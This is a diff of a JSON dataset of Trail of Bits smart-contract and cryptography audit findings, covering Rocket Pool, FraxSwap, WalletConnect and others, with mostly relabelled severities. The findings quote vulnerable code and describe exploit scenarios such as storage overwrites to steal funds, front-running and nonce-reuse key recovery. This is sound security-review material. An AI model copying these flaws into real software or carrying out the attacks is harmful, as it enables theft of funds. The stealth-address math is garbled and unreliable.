ChildStorageKind::Contributed ); Self ::deposit_event(Event::::VaultClaimed( crowdloan, (lease_start, lease_end), ctoken, who, amount, VaultPhase::Succeeded, )); Ok (()) } Figure 7.1: pallets/crowdloans/src/lib.rs: 718- Exploit Scenario The claim extrinsic is called, but the total amount in vault.contributed is not updated, leading to incorrect calculations in other places. Recommendations Short term, update the claim and refund extrinsics so that they subtract the amount from vault.contributed . Long term, add a test suite to ensure that the vault state stays consistent after the claim and refund extrinsics are called.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: Undetermined", + "Difficulty: High" ] }, { @@ -1006,7 +1016,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -1015,8 +1025,8 @@ "body": "The referral code is used in a number of extrinsic calls in the crowdloans pallet. Because the referral code is never validated, it can be a sequence of arbitrary bytes. The referral code is logged by a number of extrinsics. However, it is currently impossible to perform log injection because the referral code is printed as a hexidecimal string rather than raw bytes (using the debug representation). pub fn contribute ( origin: OriginFor , crowdloan: ParaId , #[pallet::compact] amount: BalanceOf , referral_code: Vec < u8 > , ) -> DispatchResultWithPostInfo { // ... log::trace!( target: \"crowdloans::contribute\" , \"who: {:?}, para_id: {:?}, amount: {:?}, referral_code: {:?}\" , &who, &crowdloan, &amount, &referral_code ); Ok (().into()) } Figure 9.1: pallets/crowdloans/src/lib.rs: 502-594 Exploit Scenario The referral code is rendered as raw bytes in a vulnerable environment, introducing an opportunity to perform a log injection attack. Recommendations Short term, choose and implement a data type that models the referral code semantics as closely as possible.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -1036,7 +1046,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: High" ] }, { @@ -1045,7 +1055,7 @@ "body": "The RocketStorage contract uses the eternal storage pattern. The contract is a key-value store that all protocol contracts can write to and read. However, RocketStorage has a special protected storage area that should not be writable by network contracts (gure 1.1); it should be writable only by node operators under specic conditions. This area stores data related to node operators withdrawal addresses and is critical to the security of their assets. // Protected storage (not accessible by network contracts) mapping(address => address) private withdrawalAddresses; mapping(address => address) private pendingWithdrawalAddresses; Figure 1.1: Protected storage in the RocketStorage contract (RocketStorage.sol#L24-L26) RocketStorage also has a number of setters for types that t in to a single storage slot. These setters are implemented by the raw sstore opcode (gure 1.2) and can be used to set any storage slot to any value. They can be called by any network contract, and the caller will have full control of storage slots and values. function setUint(bytes32 _key, uint _value) onlyLatestRocketNetworkContract override external { assembly { sstore (_key, _value) } } Figure 1.2: An example of a setter that uses sstore in the RocketStorage contract (RocketStorage.sol#L205-209) As a result, all network contracts can write to all storage slots in the RocketStorage contract, including those in the protected area. There are three setters that can set any storage slot to any value under any condition: setUint, setInt, and setBytes32. The addUint setter can be used if the unsigned integer representation of the value is larger than the current value; subUint can be used if it is smaller. Other setters such as setAddress and setBool can be used to set a portion of a storage slot to a value; the rest of the storage slot is zeroed out. However, they can still be used to delete any storage slot. In addition to undermining the security of the protected storage areas, these direct storage-slot setters make the code vulnerable to accidental storage-slot clashes. The burden of ensuring security is placed on the caller, who must pass in a properly hashed key. A bug could easily lead to the overwriting of the guardian, for example. Exploit Scenario Alice, a node operator, trusts Rocket Pools guarantee that her deposit will be protected even if other parts of the protocol are compromised. Attacker Charlie upgrades a contract that has write access to RocketStorage to a malicious version. Charlie then computes the storage slot of each node operators withdrawal address, including Alices, and calls rocketStorage.setUint(slot, charliesAddress) from the malicious contract. He can then trigger withdrawals and steal node operators funds. Recommendations Short term, remove all sstore operations from the RocketStorage contract. Use mappings, which are already used for strings and bytes, for all types. When using mappings, each value is stored in a slot that is computed from the hash of the mapping slot and the key, making it impossible for a user to write from one mapping into another unless that user nds a hash collision. Mappings will ensure proper separation of the protected storage areas. Strongly consider moving the protected storage areas and related operations into a separate immutable contract. This would make it much easier to check the access controls on the protected storage areas. Long term, avoid using assembly whenever possible. Ensure that assembly operations such as sstore do not enable the circumvention of access controls.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", "Difficulty: High" ] }, @@ -1055,7 +1065,7 @@ "body": "As mentioned in TOB-ROCKET-001, the RocketStorage contract uses the eternal storage pattern. This pattern uses assembly to read and write to raw storage slots. Most of the systems data is stored in this manner, which is shown in gures 2.1 and 2.2. function setInt(bytes32 _key, int _value) onlyLatestRocketNetworkContract override external { assembly { sstore (_key, _value) } } Figure 2.1: RocketStorage.sol#L229-L233 function getUint(bytes32 _key) override external view returns (uint256 r) { assembly { r := sload (_key) } } Figure 2.2: RocketStorage.sol#L159-L163 If the same storage slot were used to write a value of type T and then to read a value of type U from the same slot, the value of U could be unexpected. Since storage is untyped, Soliditys type checker would be unable to catch this type mismatch, and the bug would go unnoticed. Exploit Scenario A codebase update causes one storage slot, S, to be used with two dierent data types. The compiler does not throw any errors, and the code is deployed. During transaction processing, an integer, -1, is written to S. Later, S is read and interpreted as an unsigned integer. Subsequent calculations use the maximum uint value, causing users to lose funds. Recommendations Short term, remove the assembly code and raw storage mapping from the codebase. Use a mapping for each type to ensure that each slot of the mapping stores values of the same type. Long term, avoid using assembly whenever possible. Use Solidity as a high-level language so that its built-in type checker will detect type errors.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", "Difficulty: High" ] }, @@ -1066,7 +1076,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: High" ] }, { @@ -1075,8 +1085,8 @@ "body": "At the beginning of this audit, the Rocket Pool team mentioned an important invariant: if a node operator is allowed to withdraw funds from a minipool, the withdrawal should always succeed. This invariant is meant to assure node operators that they will be able to withdraw their funds even if the systems governance upgrades network contracts to malicious versions. To withdraw funds from a minipool, a node operator calls the close or refund function, depending on the state of the minipool. The close function calls rocketMinipoolManager.destroyMinipool. The rocketMinipoolManager contract can be upgraded by governance, which could replace it with a version in which destroyMinipool reverts. This would cause withdrawals to revert, breaking the guarantee mentioned above. The refund function does not call any network contracts. However, the refund function cannot be used to retrieve all of the funds that close can retrieve. Governance could also tamper with the withdrawal process by altering node operators withdrawal addresses. (See TOB-ROCKET-001 for more details.) Exploit Scenario Alice, a node operator, owns a dissolved minipool and decides to withdraw her funds. However, before Alice calls close() on her minipool to withdraw her funds, governance upgrades the RocketMinipoolManager contract to a version in which calls to destroyMinipool fail. As a result, the close() functions call to RocketMinipoolManager.destroyMinipool fails, and Alice is unable to withdraw her funds. Recommendations Short term, use Soliditys try catch statement to ensure that withdrawal functions that should always succeed are not aected by function failures in other network contracts. Additionally, ensure that no important data validation occurs in functions whose failures are ignored. Long term, carefully examine the process through which node operators execute withdrawals and ensure that their withdrawals cannot be blocked by other network contracts.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, { @@ -1096,7 +1106,7 @@ "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -1105,8 +1115,8 @@ "body": "Many parts of the Rocket Pool codebase that access its eternal storage compute storage locations inline, which means that these computations are duplicated throughout the codebase. Many string constants appear in the codebase several times; these include minipool.exists (shown in gure 7.1), which appears four times. Duplication of the same piece of information in many parts of a codebase increases the risk of inconsistencies. Furthermore, because the code lacks existence and type checks for these strings, inconsistencies introduced into a contract by developer error may not be detected unless the contract starts behaving in unexpected ways. setBool(keccak256(abi.encodePacked(\"minipool.exists\", contractAddress)), true); Figure 7.1: RocketMinipoolManager.sol#L216 Many storage-slot computations take parameters. However, there are no checks on the types or number of the parameters that they take, and incorrect parameter values will not be caught by the Solidity compiler. Exploit Scenario Bob, a developer, adds a functionality that sets the network.prices.submitted.node.key string constant. He ABI-encodes the node address, block, and RPL price arguments but forgets to ABI-encode the eective RPL stake amount. The code then sets an entirely new storage slot that is not read anywhere else. As a result, the write operation is a no-op with undened consequences. Recommendations Short term, extract the computation of storage slots into helper functions (like that shown in 7.2). This will ensure that each string constant exists only in a single place, removing the potential for inconsistencies. These functions can also check the types of the parameters used in storage-slot computations. function contractExistsSlot(address contract) external pure returns (bytes32) { return keccak256(abi.encodePacked(\"contract.exists\", contract); } // _getBool(keccak256(abi.encodePacked(\"contract.exists\", msg.sender)) _getBool(contractExistsSlot(msg.sender)) // setBool(keccak256(abi.encodePacked(\"contract.exists\", _contractAddress)), true) setBool(contractExistsSlot(_contractAddress), true) Figure 7.2: An example of a helper function Long term, replace the raw setters and getters in RocketBase (e.g., setAddress) with setters and getters for specic values (e.g., the setContractExists setter) and restrict RocketStorage access to these setters.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: Medium" ] }, { @@ -1115,8 +1125,8 @@ "body": "The Rocket Pool code uses eternal storage to store many named mappings. A named mapping is one that is identied by a string (such as minipool.exists) and maps a key (like contractAddress in gure 8.1) to a value. setBool(keccak256(abi.encodePacked(\"minipool.exists\", contractAddress)), true); Figure 8.1: RocketMinipoolManager.sol#L216 Given a mapping whose state variable appears at index N in the code, Solidity stores the value associated with key at a slot that is computed as follows: h = type(key) == string || type(key) == bytes ? keccak256 : left_pad_to_32_bytes slot = keccak256(abi.encodePacked(h(key), N)) Figure 8.2: Pseudocode of the Solidity computation of a mappings storage slot The rst item in a Rocket Pool mapping is the identier, which could enable an attacker to write values into a mapping that should be inaccessible to the attacker. We set the severity of this issue to informational because such an attack does not currently appear to be possible. Exploit Scenario Mapping A stores its state variable at slot n. Rocket Pool developers introduce new code, making it possible for an attacker to change the second argument to abi.encodePacked in the setBool setter (shown in gure 8.1). The attacker passes in a rst argument of 32 bytes and can then pass in n as the second argument and set an entry in Mapping A. Recommendations Short term, switch the order of arguments such that a mappings identier is the last argument and the key (or keys) is the rst (as in keccak256(key, unique_identifier_of_mapping)). Long term, carefully examine all raw storage operations and ensure that they cannot be used by attackers to access storage locations that should be inaccessible to them. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -1125,8 +1135,8 @@ "body": "FraxSwaps use of rebasing tokenstokens whose supply can be adjusted to control their pricescould cause transactions to revert after users cancel or withdraw from long-term swaps. FraxSwap oers a new type of swap called a long-term swap, which executes certain swaps over an extended period of time. Users can cancel or withdraw from long-term swaps and recover all of their purchased and unsold tokens. ///@notice stop the execution of a long term order function cancelLongTermSwap(uint256 orderId) external lock execVirtualOrders { (address sellToken, uint256 unsoldAmount, address buyToken, uint256 purchasedAmount) = longTermOrders.cancelLongTermSwap(orderId); bool buyToken0 = buyToken == token0; twammReserve0 -= uint112(buyToken0 ? purchasedAmount : unsoldAmount); twammReserve1 -= uint112(buyToken0 ? unsoldAmount : purchasedAmount); // transfer to owner of order _safeTransfer(buyToken, msg.sender, purchasedAmount); _safeTransfer(sellToken, msg.sender, unsoldAmount); // update order. Used for tracking / informational longTermOrders.orderMap[orderId].isComplete = true; emit CancelLongTermOrder(msg.sender, orderId, sellToken, unsoldAmount, buyToken, purchasedAmount); } Figure 1.1: The cancelLongTermSwap function in the UniV2TWAMMPair contract However, if a rebasing token is used in a long-term swap, the balance of the UniV2TWAMMPair contract could increase or decrease over time. Such changes in the contracts balance could result in unintended eects when users try to cancel or withdraw from long-term swaps. For example, because all long-term swaps for a pair are processed as part of any function with the execVirtualOrders modier, if the actual balance of the UniV2TWAMMPair is reduced as part of one or more rebases in the underlying token, this balance will not be reected correctly in the contracts internal accounting, and cancel and withdraw operations will transfer too many tokens to users. Eventually, this will exhaust the contracts balance of the token before all users are able to withdraw, causing these transactions to revert. Exploit Scenario Alice creates a long-term swap; one of the tokens to be swapped is a rebasing token. After some time, the tokens supply is adjusted, causing the balance of UniV2TWAMMPair to decrease. Alice tries to cancel the long-term swap, but the internal bookkeeping for her swap was not updated to reect the rebase, causing the token transfer from the contract to Alice to revert and blocking her other token transfers from completing. To allow Alice to access funds and to allow subsequent transactions to succeed, some tokens need to be explicitly sent to the UniV2TWAMMPair contract to increase its balance. Recommendations Short term, explicitly document issues involving rebasing tokens and long-term swaps to ensure that users are aware of them. Long term, evaluate the security risks surrounding ERC20 tokens and how they could aect every system component. References Common errors with rebasing tokens on Uniswap V2", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, { @@ -1135,8 +1145,8 @@ "body": "When a long-term swap is submitted to a UniV2TWAMMPair instance, the code performs checks, such as those ensuring that the selling rate of a given token is nonzero, before the order is recorded. However, the code does not validate the existing reserves for the tokens being bought in long-term swaps. ///@notice adds long term swap to order pool function performLongTermSwap(LongTermOrders storage longTermOrders, address from, address to, uint256 amount, uint256 numberOfTimeIntervals) private returns (uint256) { // make sure to update virtual order state (before calling this function) //determine the selling rate based on number of blocks to expiry and total amount uint256 currentTime = block.timestamp; uint256 lastExpiryTimestamp = currentTime - (currentTime % longTermOrders.orderTimeInterval); uint256 orderExpiry = longTermOrders.orderTimeInterval * (numberOfTimeIntervals + 1) + lastExpiryTimestamp; uint256 sellingRate = SELL_RATE_ADDITIONAL_PRECISION * amount / (orderExpiry - currentTime); require(sellingRate > 0); // tokenRate cannot be zero Figure 2.1: Uniswap_V2_TWAMM/twamm/LongTermOrders.sol#L118-L128 If a long-term swap is submitted before adequate liquidity has been added to the pool, the next pool operation will attempt to trade against inadequate liquidity, resulting in a division-by-zero error in the line highlighted in blue in gure 2.2. As a result, all pool operations will revert until the number of tokens needed to begin executing the virtual swap are added. ///@notice computes the result of virtual trades by the token pools function computeVirtualBalances( uint256 token0Start, uint256 token1Start, uint256 token0In, uint256 token1In) internal pure returns (uint256 token0Out, uint256 token1Out, uint256 ammEndToken0, uint256 ammEndToken1) { token0Out = 0; token1Out = 0; //when both pools sell, we use the TWAMM formula else { uint256 aIn = token0In * 997 / 1000; uint256 bIn = token1In * 997 / 1000; uint256 k = token0Start * token1Start; ammEndToken1 = token0Start * (token1Start + bIn) / (token0Start + aIn); ammEndToken0 = k / ammEndToken1; token0Out = token0Start + aIn - ammEndToken0; token1Out = token1Start + bIn - ammEndToken1; } Figure 2.2: Uniswap_V2_TWAMM/twamm/ExecVirtualOrders.sol#L39-L78 The long-term swap functionality can be paused by the contract owner (e.g., to prevent long-term swaps when a pool has inadequate liquidity); however, by default, the functionality is enabled when a new pool is deployed. An attacker could exploit this fact to grief a newly deployed pool by submitting long-term swaps early in its lifecycle when it has minimal liquidity. Additionally, even if a newly deployed pool is already loaded with adequate liquidity, a user could submit long-term swaps with zero intervals to trigger an integer underow in the line highlighted in red in gure 2.2. However, note that the user would have to submit at least one long-term swap that requires more than the total liquidity in the reserve: testSync(): failed! Call sequence: initialize(6809753114178753104760,5497681857357274469621,837982930770660231771 7,10991961728915299510446) longTermSwapFrom1To0(2,0) testLongTermSwapFrom0To1(23416246225666705882600004967801889944504351201487667 6541160061227714669,0) testSync() Time delay: 37073 seconds Block delay: 48 Figure 2.3: The Echidna output that triggers a revert in a call to sync() Exploit Scenario A new FraxSwap pool is deployed, causing the long-term swap functionality to be unpaused. Before users have a chance to add sucient liquidity to the pool, Eve initiates long-term swaps in both directions. Since there are no tokens available to purchase, all pool operations revert, and the provided tokens are trapped. At this point, adding more liquidity is not possible since doing so also triggers the long-term swap computation, forcing a revert. Recommendations Short term, disable new swaps and remove all the liquidity in the deployed contracts. Modify the code so that, moving forward, liquidity can be added without executing long-term swaps. Document the pool state requirements before long-term swaps can be enabled. Long term, use extensive smart contract fuzzing to test that important operations cannot be blocked.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, { @@ -1145,7 +1155,7 @@ "body": "An insucient number of events is declared in the Frax Finance contracts. As a result, malfunctioning contracts or malicious attacks may not be noticed. For instance, long-term swaps are executed in batches by the executeVirtualOrdersUntilTimestamp function: ///@notice executes all virtual orders until blockTimestamp is reached. function executeVirtualOrdersUntilTimestamp(LongTermOrders storage longTermOrders, uint256 blockTimestamp, ExecuteVirtualOrdersResult memory reserveResult) internal { uint256 nextExpiryBlockTimestamp = longTermOrders.lastVirtualOrderTimestamp - (longTermOrders.lastVirtualOrderTimestamp % longTermOrders.orderTimeInterval) + longTermOrders.orderTimeInterval; //iterate through time intervals eligible for order expiries, moving state forward OrderPool storage orderPool0 = longTermOrders.OrderPool0; OrderPool storage orderPool1 = longTermOrders.OrderPool1; while (nextExpiryBlockTimestamp < blockTimestamp) { // Optimization for skipping blocks with no expiry if (orderPool0.salesRateEndingPerTimeInterval[nextExpiryBlockTimestamp] > 0 || orderPool1.salesRateEndingPerTimeInterval[nextExpiryBlockTimestamp] > 0) { //amount sold from virtual trades uint256 blockTimestampElapsed = nextExpiryBlockTimestamp - longTermOrders.lastVirtualOrderTimestamp; uint256 token0SellAmount = orderPool0.currentSalesRate * blockTimestampElapsed / SELL_RATE_ADDITIONAL_PRECISION; uint256 token1SellAmount = orderPool1.currentSalesRate * blockTimestampElapsed / SELL_RATE_ADDITIONAL_PRECISION; (uint256 token0Out, uint256 token1Out) = executeVirtualTradesAndOrderExpiries(reserveResult, token0SellAmount, token1SellAmount); orderPool1, token0Out, token1Out, nextExpiryBlockTimestamp); updateOrderPoolAfterExecution(longTermOrders, orderPool0, } nextExpiryBlockTimestamp += longTermOrders.orderTimeInterval; } //finally, move state to current blockTimestamp if necessary if (longTermOrders.lastVirtualOrderTimestamp != blockTimestamp) { //amount sold from virtual trades uint256 blockTimestampElapsed = blockTimestamp - longTermOrders.lastVirtualOrderTimestamp; uint256 token0SellAmount = orderPool0.currentSalesRate * blockTimestampElapsed / SELL_RATE_ADDITIONAL_PRECISION; uint256 token1SellAmount = orderPool1.currentSalesRate * blockTimestampElapsed / SELL_RATE_ADDITIONAL_PRECISION; (uint256 token0Out, uint256 token1Out) = executeVirtualTradesAndOrderExpiries(reserveResult, token0SellAmount, token1SellAmount); updateOrderPoolAfterExecution(longTermOrders, orderPool0, orderPool1, token0Out, token1Out, blockTimestamp); } } Figure 3.1: Uniswap_V2_TWAMM/twamm/LongTermOrders.sol#L216-L252 However, despite the complexity of this function, it does not emit any events; it will be dicult to monitor issues that may arise whenever the function is executed. Additionally, important operations in the FPIControllerPool and CPITrackerOracle contracts do not emit any events: function toggleMints() external onlyByOwnGov { mints_paused = !mints_paused; } function toggleRedeems() external onlyByOwnGov { redeems_paused = !redeems_paused; } function setFraxBorrowCap(int256 _frax_borrow_cap) external onlyByOwnGov { frax_borrow_cap = _frax_borrow_cap; } function setMintCap(uint256 _fpi_mint_cap) external onlyByOwnGov { fpi_mint_cap = _fpi_mint_cap; } Figure 3.2: FPI/FPIControllerPool.sol#L528-L542 Events generated during contract execution aid in monitoring, baselining of behavior, and detection of suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside the baseline conditions, and it will be dicult to review the correct behavior of the contracts once they have been deployed. Exploit Scenario Eve, a malicious user, discovers a vulnerability that allows her to manipulate long-term swaps. Because no events are generated from her actions, the attack goes unnoticed. Eve uses her exploit to drain liquidity or prevent other users from swapping before the Frax Finance team has a chance to respond. Recommendations Short term, emit events for all operations that may contribute to a higher level of monitoring and alerting, even internal ones. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. A monitoring mechanism for critical events could quickly detect system compromises.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: Low" ] }, @@ -1155,8 +1165,8 @@ "body": "Explicit integer conversions can be used to bypass certain restrictions (e.g., the borrowing cap) in the FPIControllerPool contract. The FPIControllerPool contract allows certain users to either borrow or repay FRAX within certain limits (e.g., the borrowing cap): // Lend the FRAX collateral to an AMO function giveFRAXToAMO(address destination_amo, uint256 frax_amount) external onlyByOwnGov validAMO(destination_amo) { int256 frax_amount_i256 = int256(frax_amount); // Update the balances first require((frax_borrowed_sum + frax_amount_i256) <= frax_borrow_cap, \"Borrow frax_borrowed_balances[destination_amo] += frax_amount_i256; frax_borrowed_sum += frax_amount_i256; // Give the FRAX to the AMO TransferHelper.safeTransfer(address(FRAX), destination_amo, frax_amount); cap\"); } // AMO gives back FRAX. Needed for proper accounting function receiveFRAXFromAMO(uint256 frax_amount) external validAMO(msg.sender) { int256 frax_amt_i256 = int256(frax_amount); // Give back first TransferHelper.safeTransferFrom(address(FRAX), msg.sender, address(this), frax_amount); // Then update the balances frax_borrowed_balances[msg.sender] -= frax_amt_i256; frax_borrowed_sum -= frax_amt_i256; } Figure 4.1: The giveFRAXToAMO function in FPIControllerPool.sol However, these functions explicitly convert these variables from uint256 to int256; these conversions will never revert and can produce unexpected results. For instance, if frax_amount is set to a very large unsigned integer, it could be cast to a negative number. Malicious users could exploit this fact by adjusting the variables to integers that will bypass the limits imposed by the code after they are cast. The same issue aects the implementation of price_info: // Get additional info about the peg status function price_info() public view returns ( int256 collat_imbalance, uint256 cpi_peg_price, uint256 fpi_price, uint256 price_diff_frac_abs ) { fpi_price = getFPIPriceE18(); cpi_peg_price = cpiTracker.currPegPrice(); uint256 fpi_supply = FPI_TKN.totalSupply(); if (fpi_price > cpi_peg_price){ collat_imbalance = int256(((fpi_price - cpi_peg_price) * fpi_supply) / PRICE_PRECISION); price_diff_frac_abs = ((fpi_price - cpi_peg_price) * PEG_BAND_PRECISION) / fpi_price; } else { collat_imbalance = -1 * int256(((cpi_peg_price - fpi_price) * fpi_supply) / PRICE_PRECISION); price_diff_frac_abs = ((cpi_peg_price - fpi_price) * PEG_BAND_PRECISION) / fpi_price; } } Figure 4.2: The price_info function in FPIControllerPool.sol Exploit Scenario Eve submits a governance proposal that can increase the amount of FRAX that can be borrowed. The voters approve the proposal because they believe that the borrowing cap will stop Eve from changing it to a larger value. Recommendations Short term, add checks to the relevant functions to validate the results of explicit integer conversions to ensure that they are within the expected range. Long term, use extensive smart contract fuzzing to test that system invariants cannot be broken.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, { @@ -1175,44 +1185,34 @@ "body": "A hash collision could occur in the FraxLendPairDeployer contract, allowing unauthenticated users to block the deployment of certain contracts from authenticated users. The FraxLendPairDeployer contract allows any user to deploy certain contracts using the deploy function, which creates a contract name based on certain parameters: function deploy( address _asset, address _collateral, address _oracleTop, address _oracleDiv, uint256 _oracleNormalization, address _rateContract, bytes calldata _rateInitCallData ) external returns (address _pairAddress) { string memory _name = string( abi.encodePacked( \"FraxLendV1-\", IERC20(_collateral).safeName(), \"/\", IERC20(_asset).safeName(), \" - \", IRateCalculator(_rateContract).name(), \" - \", deployedPairsArray.length + 1 ) ); Figure 6.1: The header of the deploy function in the FraxLendPairDeployer contract The _deploySecond function creates a hash of this contract name and checks it to ensure that it has not already been deployed: function _deploySecond( string memory _name, address _pairAddress, address _asset, address _collateral, uint256 _maxLTV, uint256 _liquidationFee, address _oracleTop, address _oracleDiv, uint256 _oracleNormalization, address _rateContract, bytes memory _rateInitCallData, address[] memory _approvedBorrowers, address[] memory _approvedLenders ) private { bytes32 _nameHash = keccak256(bytes(_name)); require(deployedPairsByName[_nameHash] == address(0), \"FraxLendPairDeployer: Pair name must be unique\"); deployedPairsByName[_nameHash] = _pairAddress; Figure 6.2: Part of the _deploySecond function in the FraxLendPairDeployer contract Both authenticated and unauthenticated users can use this code to deploy contracts, but only authenticated users can select any name for contracts they want to deploy. Additionally, the _deployFirst function computes a salt based on certain parameters: function _deployFirst( address _asset, address _collateral, uint256 _maxLTV, uint256 _liquidationFee, address _oracleTop, address _oracleDiv, uint256 _oracleNormalization, address _rateContract, bytes memory _rateInitCallData, bool _isBorrowerWhitelistActive, bool _isLenderWhitelistActive ) private returns (address _pairAddress) { { //clones are distinguished by their data bytes32 salt = keccak256( abi.encodePacked( _asset, _collateral, _maxLTV, _liquidationFee, _oracleTop, _oracleDiv, _oracleNormalization, _rateContract, _rateInitCallData, _isBorrowerWhitelistActive, _isLenderWhitelistActive ) ); require(deployedPairsBySalt[salt] == address(0), \"FraxLendPairDeployer: Pair already deployed\"); Figure 6.3: The header of the _deployFirst function in the FraxLendPairDeployer contract Again, both authenticated and unauthenticated users can use this code, but some parameters are xed for unauthorized users (e.g., _maxLTV will always be DEFAULT_MAX_LTV and cannot be changed). However, in both cases, a hash collision could block contracts from being deployed. For example, if an unauthenticated user sees an authenticated users pending transaction to deploy a contract, he could deploy his own contract with a name or parameters that result in a hash collision, preventing the authenticated users contract from being deployed. Exploit Scenario Alice, an authenticated user, starts a custom deployment with certain parameters. Eve, a malicious user, sees Alices unconrmed transactions and front-runs them with her own call to deploy a contract with similar parameters. Eves transaction succeeds, causing Alices deployment to fail and forcing her to change either the contracts name or the parameters of the call to deploy. Recommendations Short term, prevent collisions between dierent types of deployments. Long term, review the permissions and capabilities of authenticated and unauthenticated users in every component.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" - ] - }, - { - "title": "1. Related-nonce attacks across keys allow root key recovery ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", - "body": "Given multiple addresses generated by the same sender, if any two signatures with the associated private keys use the same nonce, then the recipients private root key can be recovered. Nonce reuse attacks are a known risk for single ECDSA keys, but this attack extends the vulnerability to all keys generated by a given sender. Exploit Scenario Alice uses Bobs public key to generate addresses 1 = ( ||1 ) * + and = ( ||2 ) * + and deposits funds in each. Bobs corresponding private 2 keys will be 1 does not know ||1 ) + = ( 2 , she does know the dierence of the two: 2 = ( ||2 ) + and 1 or . Note that, while Alice = 2 1 = ( ||2 ) ( ||1 ) . As a result, she can write 2 = 1 + . Suppose Bob signs messages with hashes (respectively), and he uses the same nonce 2 and to transfer the funds out of 1 2 in both signatures. He will output signatures 1 1 and 1 ) ( , 1 and ) ( , 2 , where = ( * ) , 1 = ( 1 ) + 1 , and = 2 ( 2 + 1 + ) . Subtracting the -values gives us 1 except are known, Alice can recover 1 2 = ( 1 , and thus 1 2 , and 2 ) . Because all the terms = 2 ( ||2 ) . Recommendations Consider using deterministic nonce generation in any stealth-enabled wallets. This is an approach used in multiple elliptic curve digital signature schemes, and can be adapted to ECDSA relatively easily; see RFC 6979 . Also consider root key blinding. Set = ( || ) * + ( || ||\" \" ) * With blinding, private keys take the form = ( || ) + ( || ||\" \" ) Since the terms no longer cancel out, Alice cannot nd , and the attack falls apart. . . Finally, consider using homogeneous key derivation. Set private key for Bob is then = ( || ) + = ( || ) * + . Because Alice does not know . The , she cannot nd , and the attack falls apart. References ECDSA: Handle with Care RFC 6979: Deterministic Usage of the Digital Signature Algorithm (DSA) and Elliptic Curve Digital Signature Algorithm (ECDSA)", - "labels": [ - "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "2. Limited forgeries for related keys ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", - "body": "If Bob signs a message for an address generated by Alice, Alice can convert it into a valid signature for another address. She cannot, however, control the hash of the message being signed, so this attack is of limited value. As with the related-nonce attack, this attack relies on Alice knowing the dierence in discrete logarithms between two addresses. Exploit Scenario Alice generates addresses 1 = ( ||1 ) * + and 2 = ( ||2 ) * + and deposits funds in each account. As before, Alice knows discrete logs for 1 and , and 2 = 2 . 1 , the dierence of the Bob transfers money out of , generating signature 2 * -coordinate of (where where is the ( , ) of a message with hash , is the nonce). The signature is validated by computing = 1 * + 1 * 2 and verifying that the -coordinate of matches . Alice can convert this into a signature under for a message with hash ' = + . Verifying this signature under , computing 1 1 becomes: = ( + 1 ) * + 1 * 1 1 = * + 1 1 * + 1 * 1 = * + 1 ( 1 + ) * 1 = * + 1 * 2 This is the same relation that makes will be correct. ( , ) a valid signature on a message with hash , so Note that Alice has no control over the value of ' would have to nd a preimage preimages is, to date, a hard problem for SHA-256 and related functions. under the given hash function. Computing , so to make an eective exploit, she ' of ' Recommendations Consider root key blinding, as above. The attack relies on Alice knowing blinding prevents her from learning it. , and root key Consider homogeneous key derivation, as above. Once again, depriving Alice of obviates the attack completely.", + "title": "1. Use of outdated dependencies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-walletconnectv2-securityreview.pdf", + "body": "We used npm audit and lerna-audit to detect the use of outdated dependencies in the codebase. These tools discovered a number of vulnerable packages that are referenced by the package-lock.json les. The following tables describe the vulnerable dependencies used in the walletconnect-utils and walletconnect-monorepo repositories : walletconnect-utils Dependencies Vulnerability Report Vulnerability", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Informational", "Difficulty: Undetermined" ] }, { - "title": "3. Mutual transactions can be completely deanonymized ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", - "body": "When Alice and Bob both make stealth payments to each other, they generate the same Shared Secret #i for transaction i, which is used to derive destination keys for Bob and Alice: Symbol", + "title": "2. No protocol-level replay protections in WalletConnect ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-walletconnectv2-securityreview.pdf", + "body": "Applications and wallets using WalletConnect v2 can exchange messages using the WalletConnect protocol through a public WebSocket relay server. Exchanged data is encrypted and authenticated with keys unknown to the relay server. However, using dynamic testing during the audit, we observed that the protocol does not protect against replay attacks. The WalletConnect authentication protocol is essentially a challenge-response protocol between users and servers, where users produce signatures using the private keys from their wallets. A signature is performed over a message containing, among many other components, a nonce value chosen by the server. This nonce value is intended presumably to prevent an adversary from replaying an old signature that a user generated to authenticate themselves. However, there does not seem to be any validation against this nonce value (except validation that it exists), so the library would accept replayed signatures. In addition to 